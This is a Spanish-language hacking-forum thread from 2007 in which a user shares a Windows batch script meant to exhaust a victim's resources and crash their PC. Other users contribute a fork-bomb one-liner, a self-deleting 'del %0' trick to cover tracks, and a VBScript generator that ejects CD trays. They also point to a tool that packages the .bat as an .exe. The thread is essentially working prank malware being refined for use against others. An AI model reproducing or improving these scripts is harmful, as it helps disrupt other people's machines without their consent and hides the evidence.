elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ¿Me ayudais con esto?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: ¿Me ayudais con esto?  (Leído 6,868 veces)
TheWhiteRider

Desconectado Desconectado

Mensajes: 5


Ver Perfil
¿Me ayudais con esto?
« en: 21 Mayo 2007, 16:47 pm »

Bueno,antes de nada hola a todos.
He creado un .bat que es bastante tonto,su objetivo es simplemente consumir todos los recursos de la víctima y hacer que se le acabe colgando el PC.Entonces lo que os queria preguntar era..

1º.¿Hay algún código para abrir la disquetera?
2º¿Alguna forma de que el bat se borre a si mismo cuando acabe su trabajo?

Aqui os dejo el código,Saludos.

Código:
@echo
msg * "No se por que..pero creo que esto se te va a reiniciar..."
:bucle
start www.xxxxxxxx.com
start www.xxxxxxxx.com
start www.xxxxxxxx.com
goto bucle

Gracias de antemano amigos.


En línea

zhynar_X


Desconectado Desconectado

Mensajes: 515


Use linux my friend...


Ver Perfil WWW
Re: ¿Me ayudais con esto?
« Respuesta #1 en: 21 Mayo 2007, 18:49 pm »

Hola, la disquetera no se como sa hace para abrirla per si que se para eliminar el bat.Es asi:
Código:
@echo off
del nombredelbat.bat
Para agotar los recursos del sistema es mas simple hacer asi:
Código:
@echo off
for /l %%i in (1,0,2) do (start)

Espero que te sirva

Saludos


En línea

Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: ¿Me ayudais con esto?
« Respuesta #2 en: 21 Mayo 2007, 19:20 pm »

En vez de del nombredelbat.bat puedes usar del %0, para abrir la disquetera no hay codigo en batch.
En línea

TheWhiteRider

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: ¿Me ayudais con esto?
« Respuesta #3 en: 21 Mayo 2007, 22:17 pm »

Hm,vale,gracias por todo,Lo de la disquetera juraría haberlo visto,pero era un bat que generaba un archivo VB..o algo asi..
En línea

zhynar_X


Desconectado Desconectado

Mensajes: 515


Use linux my friend...


Ver Perfil WWW
Re: ¿Me ayudais con esto?
« Respuesta #4 en: 22 Mayo 2007, 00:07 am »

A mi tambien me suena lo de abrir la disquetera(si a la disquetera te refieres a la bandeja del cd) en el subforo de ejercicios hay un de abrir la disquetera perno no esta el codigo

Es este post:
http://foro.elhacker.net/index.php/topic,151340.0.html
En línea

Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
TheWhiteRider

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: ¿Me ayudais con esto?
« Respuesta #5 en: 22 Mayo 2007, 16:47 pm »

Pues ya lo tengo,Muchas gradcias de todas formaspor si a alguien le interesa el código es el siguiente
 
Código:
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> abrir.vbs 
echo Set colCDROMs = oWMP.cdromCollection >> abrir.vbs
echo. >> abrir.vbs
echo if colCDROMs.Count >= 1 then >> abrir.vbs
echo For i = 0 to colCDROMs.Count - 1 >> abrir.vbs
echo colCDROMs.Item(i).Eject >> abrir.vbs
echo Next ' cdrom >> abrir.vbs
echo End If >> abrir.vbs
abrir.vbs
En línea

zhynar_X


Desconectado Desconectado

Mensajes: 515


Use linux my friend...


Ver Perfil WWW
Re: ¿Me ayudais con esto?
« Respuesta #6 en: 22 Mayo 2007, 18:37 pm »

Y para cerrar la disquetera como seria??

Saludos
En línea

Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
TheWhiteRider

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: ¿Me ayudais con esto?
« Respuesta #7 en: 22 Mayo 2007, 19:14 pm »

Imagino que habría que cambiar donde pone "eject" y poner otra cosa...peor ni idea xDDD hmm .

Y..¿Hay alguna forma de que un Bat sea ejecutable?
« Última modificación: 22 Mayo 2007, 19:27 pm por TheWhiteRider » En línea

zhynar_X


Desconectado Desconectado

Mensajes: 515


Use linux my friend...


Ver Perfil WWW
Re: ¿Me ayudais con esto?
« Respuesta #8 en: 22 Mayo 2007, 20:06 pm »

Usando un compilador para transformar .bat a .exe
En línea

Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: ¿Me ayudais con esto?
« Respuesta #9 en: 10 Julio 2007, 11:12 am »

Bueno pero lo de la disketera no es codigo puro en Batch, sino conbinado con Visual Basic Script...

Y lo de pasar a .exe pues mira...bajate el Fast exe-batch maker de Hendrix del siguiente enlace...

http://es.geocities.com/cusacoxa/Fast_Exe_Batch_Maker.zip

Saludos!!
En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
me ayudais un momento con el msn? « 1 2 »
Mensajería
scr21 16 8,617 Último mensaje 18 Agosto 2011, 14:05 pm
por Triper0
Buenas,me ayudais con un Windows Vista??
Bugs y Exploits
ps3ps3ps3 2 3,488 Último mensaje 3 Abril 2012, 22:26 pm
por ps3ps3ps3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines